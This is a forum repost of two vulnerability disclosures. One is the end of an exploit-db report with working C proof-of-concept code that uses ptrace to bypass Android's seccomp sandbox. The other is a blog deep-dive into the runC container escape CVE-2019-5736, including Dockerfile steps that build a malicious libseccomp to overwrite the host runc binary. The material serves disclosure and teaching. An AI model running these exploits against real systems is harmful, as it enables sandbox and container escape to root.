[true +1, false +0] 004f if nr >= 0x0000001b: [true +113, false +112] -> ret TRAP 00c0 ret ALLOW (syscalls: ptrace) [...] ===== filter 2 (449 instructions) ===== 0001 if arch != ARM: [true +0, false +1] -> ret TRAP [...] 00b6 if nr < 0x00000019: [true +4, false +0] -> ret ALLOW (syscalls: getuid) 00b7 if nr >= 0x0000001a: [true +3, false +8] -> ret ALLOW (syscalls: ptrace) 01c0 ret TRAP [...] 007f if nr >= 0x00000073: [true +0, false +5] 0080 if nr >= 0x00000076: [true +0, false +2] 0081 if nr < 0x00000079: [true +57, false +0] -> ret ALLOW (syscalls: fsync, sigreturn, clone) [...] ================ Therefore, this not only breaks the app sandbox, but can probably also be used to break part of the isolation of a Chrome renderer process. To test this, build the following file (as an aarch64 binary) and run it from app context (e.g. using connectbot): ================ */ #include <stdio.h> #include <string.h> #include <unistd.h> #include <err.h> #include <signal.h> #include <sys/ptrace.h> #include <errno.h> #include <sys/wait.h> #include <sys/syscall.h> #include <sys/user.h> #include <linux/elf.h> #include <asm/ptrace.h> #include <sys/uio.h> int main(void) { setbuf(stdout, NULL); pid_t child = fork(); if (child == -1) err(1, "fork"); if (child == 0) { pid_t my_pid = getpid(); while (1) { errno = 0; int res = syscall(__NR_gettid, 0, 0); if (res != my_pid) { printf("%d (%s)\n", res, strerror(errno)); } } } sleep(1); if (ptrace(PTRACE_ATTACH, child, NULL, NULL)) err(1, "ptrace attach"); int status; if (waitpid(child, &status, 0) != child) err(1, "wait for child"); if (ptrace(PTRACE_SYSCALL, child, NULL, NULL)) err(1, "ptrace syscall entry"); if (waitpid(child, &status, 0) != child) err(1, "wait for child"); int syscallno; struct iovec iov = { .iov_base = &syscallno, .iov_len = sizeof(syscallno) }; if (ptrace(PTRACE_GETREGSET, child, NT_ARM_SYSTEM_CALL, &iov)) err(1, "ptrace getregs"); printf("seeing syscall %d\n", syscallno); if (syscallno != __NR_gettid) errx(1, "not gettid"); syscallno = __NR_swapon; if (ptrace(PTRACE_SETREGSET, child, NT_ARM_SYSTEM_CALL, &iov)) err(1, "ptrace setregs"); if (ptrace(PTRACE_DETACH, child, NULL, NULL)) err(1, "ptrace syscall"); kill(child, SIGCONT); sleep(5); kill(child, SIGKILL); return 0; } /* ================ If the attack works, you'll see "-1 (Operation not permitted)", which indicates that the seccomp filter for swapon() was bypassed and the kernel's capability check was reached. For comparison, the following (a straight syscall to swapon()) fails with SIGSYS: ================ #include <unistd.h> #include <sys/syscall.h> int main(void) { syscall(__NR_swapon, 0, 0); } ================ Attaching screenshot from connectbot. I believe that a sensible fix would be to backport the behavior change that occured in kernel 4.8 to Android's stable branches. */ Sursa: https://www.exploit-db.com/exploits/46434
  25. Breaking out of Docker via runC – Explaining CVE-2019-5736 Feb 21, 2019 by Yuval Avrahami Last week (2019-02-11) a new vulnerability in runC was reported by its maintainers, originally found by Adam Iwaniuk and Borys Poplawski. Dubbed CVE-2019-5736, it affects Docker containers running in default settings and can be used by an attacker to gain root-level access on the host. Aleksa Sarai, one of runC’s maintainers, found that the same fundamental flaw exists in LXC. As opposed to Docker though, only privileged LXC containers are vulnerable. Both runC and LXC were patched and new versions were released. The vulnerability gained a lot of traction and numerous technology sites and commercial companies addressed it in dedicated posts. Here at Twistlock, our CTO John Morello wrote an excellent piece with all the relevant details and the mitigations offered by the Twistlock platform. Initially, the official exploit code wasn’t to be released publicly until 2019-02-18, in order to prevent malicious parties from weaponizing it before users have had some time to update. In the following days though, several people decided to release their own exploit code. That led the runC team to eventually release their exploit code earlier (2019-02-13) since – as they put it – “the cat was out of the bag”. This post aims to be a comprehensive technical deep dive into the vulnerability and it’s various exploitation methods. So What Is runC? RunC is a container runtime originally developed as part of Docker and later extracted out as a separate open source tool and library. As a “low level” container runtime, runC is mainly used by “high level” container runtimes (e.g. Docker) to spawn and run containers, although it can be used as a stand-alone tool. “High level” container runtimes like Docker will normally implement functionalities such as image creation and management and will use runC to handle tasks related to running containers – creating a container, attaching a process to an existing container (docker exec) and so on. Procfs To understand the vulnerability, we need to go over some procfs basics. The proc filesystem is a virtual filesystem in Linux that presents information primarily about processes, typically mounted to /proc. It is virtual in a sense that it does not exist on disk. Instead, the kernel creates it in memory. It can be thought of as an interface to system data that the kernel exposes as a filesystem. Each process has its own directory in procfs, at /proc/[pid]: As shown in the image above, /proc/self is a symbolic link to the directory of the currently running process (in this case pid 177). Each process’s directory contains several files and directories with information on the process. For the vulnerability, the relevant ones are: /proc/self/exe – a symbolic link to the executable file the process is running, and ; /proc/self/fd – a directory containing the file descriptors open by the process. For example, by listing the files under /proc/self using ls /proc/self one can see that /proc/self/exe points to the ‘ls’ executable. That makes sense as the one accessing /proc/self is the ‘ls’ process that our shell spawned. The Vulnerability Let’s go over the vulnerability overview given by the runC team: The vulnerability allows a malicious container to (with minimal user interaction) overwrite the host runc binary and thus gain root-level code execution on the host. The level of user interaction is being able to run any command ... as root within a container in either of these contexts: Creating a new container using an attacker-controlled image. Attaching (docker exec) into an existing container which the attacker had previous write access to. Those two scenarios might seem different, but both require runC to spin up a new process in a container and are implemented similarly. In both cases, runC is tasked with running a user-defined binary in the container. In Docker, this binary is either the image’s entry point when starting a new container, or docker exec’s argument when attaching to an existing container. When this user binary is run, it must already be confined and restricted inside the container, or it can jeopardize the host. In order to accomplish that, runC creates a ‘runC init’ subprocess which places all needed restrictions on itself (such as entering or setting up namespaces) and effectively places itself in the container. Then, the runC init process, now in the container, calls the execve syscall to overwrite itself with the user requested binary. This is the method used by runC both for creating new containers and for attaching a process to an existing container. The researchers who revealed the vulnerability discovered that an attacker can trick runC into executing itself by asking it to run /proc/self/exe, which is a symbolic link to the runC binary on the host. An attacker with root access in the container can then use /proc/[runc-pid]/exe as a reference to the runC binary on the host and overwrite it. Root access in the container is required to perform this attack as the runC binary is owned by root. The next time runC is executed, the attacker will achieve code execution on the host. Since runC is normally run as root (e.g. by the Docker daemon), the attacker will gain root access on the host. Why not runC init? The image above might mislead some to believe the vulnerability (i.e. tricking runC into executing itself) is redundant. That is, why can’t an attacker simply overwrite /proc/[runc-pid]/exe instead? A patch for a similar runC vulnerability, CVE-2016-9962, mitigates this kind of attack. CVE-2016-9962 revealed that the runC init process possessed open file descriptors from the host which could be used by an attacker in the container to traverse the host’s filesystem and thus break out of the container. Part of the patch for this flaw was setting the runc init process as ‘non-dumpable’ before it entering the container. In the context of CVE-2019-5736, the ‘non-dumpable’ flag denies other processes from dereferencing /proc/[pid]/exe, and therefore mitigates overwriting the runC binary through it [1]. Calling execve drops this flag though, and hence the new runC process’ /proc/[runc-pid]/exe is accessible. The Symlink Problem The vulnerability may appear to contradict the way symbolic links are implemented in Linux. Symbolic links simply hold the path to their target. For a runC process, /proc/self/exe should contain something like /usr/sbin/runc. When a symlink is accessed by a process, the kernel uses the path present in the link to find the target under the root of the accessing process. That begs the question – when a process in the container opens the symbolic link to the runC binary, why doesn’t the kernel searches for the runC path inside the container root? The answer is that /proc/[pid]/exe does not follow the normal semantics for symbolic links. Technically this might count as a violation of POSIX, but as I mentioned earlier procfs is a special filesystem. When a process opens /proc/[pid]/exe, there is none of the normal procedure of reading and following the contents of a symlink. Instead, the kernel just gives you access to the open file entry directly. Exploitation Soon after the vulnerability was reported, when no POCs were publicly released yet, I attempted to develop my own POC based on the detailed description of the vulnerability given in the LXC patch addressing it. You can find the complete POC code here. Let’s break down LXC’s description of the vulnerability: when runC attaches to a container the attacker can trick it into executing itself. This could be done by replacing the target binary inside the container with a custom binary pointing back at the runC binary itself. As an example, if the target binary was /bin/bash, this could be replaced with an executable script specifying the interpreter path #!/proc/self/exe The ‘#!’ syntax is called shebang and is used in scripts to specify an interpreter. When the Linux loader encounters the shebang, it runs the interpreter instead of the executable. As seen in the video, the program finally executed by the loader is: interpreter [optional-arg] executable-path When the user runs something like docker exec container-name /bin/bash, the loader will recognize the shebang in the modified bash and execute the interpreter we specified – /proc/self/exe, which is a symlink to the runC binary. We can proceed to overwrite the runC binary from a separate process in the container through /proc/[runc-pid]/exe. The attacker can then proceed to write to the target of /proc/self/exe to try and overwrite the runC binary on the host. However in general, this will not succeed as the kernel will not permit it to be overwritten whilst runC is executing. Basically, we cannot overwrite the runC binary while a process is running it. On the other hand, if the runC process exits, /proc/[runc-pid]/exe will vanish and we will lose the reference to the runC binary. To overcome this, we open /proc/[runc-pid]/exe for reading in our process, which creates a file descriptor at /proc/[our-pid]/fd/3. We then wait for the runC process to exit, and proceed to open /proc/[our-pid]/fd/3 for writing, and overwrite runC. Here is the code for overwrite_runc, shortened for brevity: Let’s see some action! The exploit output shows the steps taken to overwrite runC. You can see that the runC process is running as pid 20054. The video can also be seen here. This method has one setback though – it requires an additional process to run the attacker code. Since containers are started with only one process (i.e. the Docker’s image entry point), this approach couldn’t be used to create a malicious image that will compromise the host when run. Some other POCs you might have seen that implement a similar approach are Frichetten’s and feexd’s. Shared Libraries Approach A different exploitation method is used in the official POC released by runC’s maintainers and is superior to POCs similar to mine since it can be implemented to compromise the host through two separate methods: When a user execs a command into an existing attacker controlled container When a user runs a malicious image We’ll now look into building a malicious image since the previous POC already demonstrated the first scenario. The POC I wrote for this method is heavily based on q3k’s POC, which, to the best of my knowledge, was the first published malicious image POC. You can view the full POC code here. Let’s go over the Dockerfile used to build the malicious image. First, the entry point of the image is set to /proc/self/exe in order to trick runC into executing itself when the image is run. # Create a symbolic link to /proc/self/exe and set it as the image entrypoint RUN set -e -x ;\ ln -s /proc/self/exe /entrypoint ENTRYPOINT [ "/entrypoint" ] RunC is dynamically linked to several shared libraries at run time, which can be listed using the ldd command. When the runC process is executed in the container, those libraries are loaded into the runC process by the dynamic linker. It is possible to substitute one of those libraries with a malicious version, that will overwrite the runC binary upon being loaded into the runC process. Our Dockerfile builds a malicious version of the libseccomp library: # Append the run_at_link function to the libseccomp-2.3.1/src/api.c file and build libseccomp ADD run_at_link.c /root/run_at_link.c RUN set -e -x ;\ cd /root/libseccomp-2.3.1 ;\ cat /root/run_at_link.c >> src/api.c ;\ DEB_BUILD_OPTIONS=nocheck dpkg-buildpackage -b -uc -us ;\ dpkg -i /root/*.deb The Dockerfile appends the content of run_at_link.c one of libsecomp’s source files. Subsequently, the malicious libsecomp is built. The constructor attribute (a GCC-specific syntax) indicates that the run_at_link function is to be executed as an initialization function [2] for libseccomp after the dynamic linker loads the library into the runC process. Since run_at_link will be executed by the runC process, it can access the runC binary at /proc/self/exe. The runC process must exit for the runC binary to be writable though. To enforce the exit, run_at_link calls the execve syscall to execute overwrite_runc. Since execve doesn’t affect the file descriptors open by the process, the same file descriptor trick from the previous POC can be used: The runC process loads the libseccomp library and transfers execution to the run_at_link function. run_at_link opens the runC binary for reading through /proc/self/exe. This creates a file descriptor at /proc/self/fd/${runc_fd_read}. run_at_link calls execve to execute overwrite_runc. The process is no longer running the runC binary, overwrite_runc opens /proc/self/fd/runc_fd_read for writing and overwrites the runC binary. For the following video, I built a malicious image that overwrites the runC binary with a simple script that spawns a reverse shell at port 2345. The docker run command executes runC twice. Once to create and run the container, which executes the POC to overwrite runC, and then again to stop the container using runc delete [3]. The second time runC is executed, it is already overwritten, and hence the reverse shell script is executed instead. The Fix RunC and LXC were both patched using the same approach, which is described clearly in the LXC patch commit: To prevent this attack, LXC has been patched to create a temporary copy of the calling binary itself when it starts or attaches to containers. To do this LXC creates an anonymous, in-memory file using the memfd_create() system call and copies itself into the temporary in-memory file, which is then sealed to prevent further modifications. LXC then executes this sealed, in-memory file instead of the original on-disk binary. Any compromising write operations from a privileged container to the host LXC binary will then write to the temporary in-memory binary and not to the host binary on-disk, preserving the integrity of the host LXC binary. Also as the temporary, in-memory LXC binary is sealed, writes to this will also fail. RunC has been patched using the same method. It re-executes from a temporary copy of itself when it starts or attaches to containers. Consequently, /proc/[runc-pid]/exe now points to the temporary file, and the runC binary can’t be reached from within the container. The temporary file is also sealed to block writing to it, although overwriting it shouldn’t compromise the host. This patch introduced some issues though. The temporary runC copy is created in-memory after the runc init process has already applied the container’s cgroup memory constraints on itself. For containers running with a relatively low memory limit (e.g 10Mb), this can cause processes in the container to be oom-killed (Out Of Memory killed) by the kernel when the runC init process attaches to the container. If you are interested, an issue regarding this complication was created and contains a discussion about alternative fixes that might not introduce the same problem. CVE-2019-5736 and Privileged Containers As a general rule of thumb, privileged containers (of a given container runtime) are less secure then unprivileged containers (of the same runtime). Earlier I stated that the vulnerability affects all Docker containers but only LXC’s privileged containers. So why are Docker unprivileged containers vulnerable while LXC unprivileged containers aren’t? Well, it’s because LXC and Docker define privileged containers differently. In fact, Docker unprivileged containers are considered privileged according to LXC philosophy. Privileged containers are defined as any container where the container uid 0 is mapped to the host's uid 0. The main difference is that LXC runs unprivileged containers in a separate user namespace by default, while Docker doesn’t. User namespaces are a feature of Linux that can be used to separate the container root from the host root. The root inside the container, as well as all other users, are mapped to unprivileged users on the host. In other words, a process can have root access for operations inside the container but is unprivileged for operations outside it. If you would like a more in-depth explanation, I recommend LWN’s namespace series So how does running the container in a user namespace mitigate this vulnerability? The attacker is root inside the container but is mapped to an unprivileged user on the host. Therefore, when the attacker tries to open the host’s runC binary for writing, he is denied by the kernel. You might wonder why Docker doesn’t run containers in a separate user namespace by default. It’s because user namespaces do have some drawbacks in the context of containers, which are a bit out of the scope of this post. If you are interested, Docker and rkt (another container runtime) both list the limitations of running containers in user namespaces. Ending Note I hope this post gave you a bit of insight into the different aspects of this vulnerability. If you are using either runC, Docker, or LXC, don’t forget to update to the patched version. Feel free to reach out with any questions you may have through email or @TwistlockLabs. [1] As a side note, privileged Docker containers (before the new patch) could use the /proc/pid/exe of the runc init process to overwrite the runC binary. To be exact, the specific privileges required are SYS_CAP_PTRACE and disabling AppArmor. [2] For those familiar with Windows DLLs, it resembles DllMain. [3] The container is stopped after overwrite_runc exits, since overwrite_runc was executed as the init process (PID 1) of the container. Yuval Avrahami | Security Researcher Yuval Avrahami is a security researcher at Twistlock, dealing with hacking and securing anything related to containers. Yuval is a veteran of the Israeli Air Force, where he served in the role of a researcher. Sursa: https://www.twistlock.com/labs-blog/breaking-docker-via-runc-explaining-cve-2019-5736/
      • 1
      • Upvote
×
×
  • Create New...